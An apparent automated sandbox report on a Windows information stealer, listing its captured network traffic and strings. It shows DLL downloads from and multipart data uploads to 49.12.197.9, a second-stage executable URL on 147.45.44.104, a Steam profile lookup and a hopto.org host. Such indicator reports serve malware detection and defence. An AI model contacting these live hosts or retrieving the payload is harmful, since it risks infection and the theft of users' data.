                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 131345Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A05237 GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_02A05237
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                      Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exe1kkkk
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exeJ5
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/a43486128347.exetion:
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                      Source: file.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, file.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: file.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                      Source: file.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: file.exeString found in binary or memory: http://ocsp.comodoca.com0
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
